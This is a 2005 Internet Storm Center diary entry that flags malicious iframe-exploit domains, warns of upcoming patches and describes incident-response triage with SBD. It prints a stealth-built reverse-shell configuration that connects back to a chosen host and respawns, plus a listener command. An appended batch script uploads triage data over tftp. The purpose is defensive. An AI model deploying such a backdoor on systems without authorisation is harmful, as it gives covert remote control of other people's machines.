SANS ISC: InfoSec Handlers Diary Blog - Internet Storm Center Diary 2005-06-13

iframeDOLLARS.biz redux ; P2P == Prepare to Patch ; I'm the MAP ; Remote Malware Acquisition

Published: 2005-06-13
Last Updated: 2005-06-14 01:12:57 UTC
by William Salusky (Version: 1)
I thought a few things were newsworthy today. Also, after a recent conversation with another Incident Responder interested in improved malware recovery techniques, I wanted to share a method that I've been happily using for a while now when performing remote host analysis to identify and retrieve malicious code samples.

iframeDOLLARS.biz redux

Holy smokes, the iframeDOLLARS business practice is back up and running at (www.iframedollars.biz) 195.95.218.170 and (bestcounter.biz) 195.95.218.171. We've also received reports of malicious hosting at 195.95.218.172. I personally (NOT SANS!!!) highly recommend these domains and IPs for blackholing on your networks. While you're at it, if you manage large proxies and find new hits for iframeDOLLARS exploits, we'd like to hear about them.

(p2p) It's free, so Prepare to Patch

It's Fr^h^hMonday the 13th, so p2p. I'm not talking about installing spyware- and adware-riddled software that tempts you to violate multiple laws by gaining access to free warez/music/etc... I'm talking about "p2p" as in "Prepare to Patch". Be forewarned that more than a few patches of significance will become available for an operating system near you starting Tuesday the 14th. Oh yeah, by the way, these patch downloads are also free!

The SANS handlers have received a vendor notice from ISS of a potential incompatibility between specific BlackICE product versions running on Windows 2000 and a revision of a Microsoft patch scheduled for release on June 14th. BlackICE users on Windows 2000, please make sure your engine is running BlackICE PC/Server Protection version "cnr".

The MAP - and this one is not in Dora the Explorer's backpack

The availability of the MAP from iDefense.com was posted in several forums last week. I'm intrigued and will be checking it out soon. Even though I have a strong preference for doing this type of work on a unix platform, based upon a quick read of the included tool features there appear to be a few native Windows analysis functions that I wouldn't know how to replicate in the linux world.

Remote Malware Acquisition with SBD

I have an ongoing need to investigate, and to assist other investigators with, remote machines in order to identify malware and retrieve suspicious or obviously malicious samples. I do not often require full GUI console access to get to the root of the problem, so talking someone through the installation of VNC or the configuration of terminal services can be a tedious experience. I have found that using SBD, which is available from http://tigerteam.se/dl/sbd/, gave me pretty much all I needed: just a simple encrypted command line reverse shell delivered to a host of your choosing. SBD, aka ShadowInteger's Backdoor (and no, it's not really as evil as it sounds), supports compilation on both unix and win32 (cygwin/mingw) environments. Several AntiVirus vendors have started flagging this tool as a PUP - a Potentially Unwanted Program. True enough, most security tools are double edged swords.



Download the source for yourself. I still use sbd-1.33, it's certainly stable enough for my purposes. A shortcut to creating your custom sbd binary follows:



I recommend making the following modifications to the #define values in the sbd.h header so they suit your environment.

#define HOST "IP.or.host.name"          // Your sbd binary will connect back to this.
#define PORT 10001                      // The port your binary will attempt to connect to.
#define EXECPROG "cmd.exe"              // SBD will send you an encrypted shell.
#define ENCRYPTION 1                    // Well, not encrypted if you don't set this variable.
#define SHARED_SECRET "Sup3rDup3rp455w0rd" // This is my personal AES shared secret, NOT!
#define RESPAWN_ENABLED 1               // If you accidentally drop the reverse shell...
#define RESPAWN_INTERVAL 120            // ...it will attempt to reconnect every 120 seconds (the interval is in seconds).
#define QUIET 1                         // No chatter on the remote console.
#define VERBOSE 0
#define DAEMONIZE 1                     // Detach from the console on the remote host.


To build your Windows binary, execute the following from a Cygwin Bash shell

$ make win32bg CFLAGS=-DSTEALTH

If all goes well your new SBD binary is now hardcoded to perform a specific action by default which is to connect back to your host and present you with a cmd.exe shell.



To receive a connection from a suspect host, make sure you're running an appropriately configured sbd binary. The same binary can be used as sending client or receiving server.


On my linux host, using a linux SBD binary of course, I first start a typescript session (script) so that I will have a log of everything I've done remotely, then I execute the following:

sbd -k Sup3rDup3rp455w0rd -l -p 10001 -r 0

Once you have your sbd listener waiting you can provide phone/email/IM/pager instructions to your remote workstation user to grab and execute your custom sbd binary. The remote user should not have to provide any fancy command line arguments, and while it's bad security form they can even execute directly from your webpage. I leave a web server and tftp server available for tool retrieval and tftp uploads enabled so I can push malware samples back to myself.


Once the remote user executes your custom SBD binary you should have a command shell appear in the window you just executed your sbd listener in. Yay, let the healing begin.

Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:\

At this point your creativity as an Incident Responder is the only limit.

TFTP retrieval of tools.

Directory listings in reverse order 'dir /od'

Hidden file listings 'dir /od /ah'

Registry run key listing using 'reg' (XP)

TFTP upload of malicious samples.

To bring this diary to a close, I leave it as a challenge for another handler to present you with an IR SBD based methodology that utilizes only the tools available to the default unmodified native operating system vs. a methodology that leverages the retrieval of supporting analysis tools. If the challenge is not accepted, I'll share my process.
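One way to run the triage steps listed above in a single pass through the reverse shell, using only tools native to Windows XP, as an added example that is not from the diary: the script collects the Run/RunOnce keys with reg, date-sorted directory listings including hidden files, the process and socket tables, and pushes the result back over tftp. HANDLER is a placeholder for your listener host, and tasklist and netstat -ano assume XP Professional SP2 or later.

```batch
@echo off
rem Native-tool triage collector (added example, not from the diary).
rem Assumes Windows XP Pro with reg.exe, tasklist.exe, netstat.exe and
rem tftp.exe present, and a TFTP server with uploads enabled on the
rem handler's host. HANDLER is a placeholder; set it before use.
setlocal
set HANDLER=IP.or.host.name
set OUT=%TEMP%\triage_%COMPUTERNAME%.txt

echo === triage started %DATE% %TIME% on %COMPUTERNAME% === > "%OUT%"

rem Autostart entries: the run keys the diary lists via 'reg' on XP.
echo. >> "%OUT%"
echo === HKLM/HKCU Run and RunOnce keys === >> "%OUT%"
for %%K in (HKLM HKCU) do (
  reg query "%%K\Software\Microsoft\Windows\CurrentVersion\Run" >> "%OUT%" 2>&1
  reg query "%%K\Software\Microsoft\Windows\CurrentVersion\RunOnce" >> "%OUT%" 2>&1
)

rem Date-sorted listings; /a includes hidden and system files so a
rem recently dropped hidden binary lands at the bottom of each list.
echo. >> "%OUT%"
echo === date-sorted listings, hidden files included === >> "%OUT%"
for %%D in ("%SystemRoot%" "%SystemRoot%\system32" "%TEMP%") do (
  echo --- %%~D --- >> "%OUT%"
  dir /od /a %%D >> "%OUT%" 2>&1
)

rem Running processes with the services they host, and open sockets
rem with owning PIDs, to tie a suspicious file to a live process.
echo. >> "%OUT%"
echo === processes and hosted services === >> "%OUT%"
tasklist /svc >> "%OUT%" 2>&1
echo. >> "%OUT%"
echo === sockets with owning PIDs === >> "%OUT%"
netstat -ano >> "%OUT%" 2>&1

rem Push the report back in binary mode to the handler's TFTP server.
tftp -i %HANDLER% put "%OUT%" triage_%COMPUTERNAME%.txt
endlocal
```

Anything in the listings that looks like a sample can then be pushed back the same way with tftp -i put, keeping the collection log and the sample retrieval in the same typescript.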



Build it. Use it. Finally, let us know how you use it.


Thanks, and we'll leave the light on.

William Salusky
wsalusky at gmail dot com
Handler on Duty (heh heh, Duty)